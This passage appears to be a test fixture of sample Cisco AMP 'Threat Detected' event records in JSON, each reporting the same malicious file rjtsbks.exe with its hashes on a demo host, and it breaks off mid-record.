+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":878000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163612","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":863000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163611","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":863000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163610","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":816000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163609","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":738000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163608","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":722000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":722000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":691000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":691000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":644000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":629000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":598000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":582000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":582000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":551000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":551000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":535000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":520000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163593","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":442000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163592","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":442000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163591","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":426000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 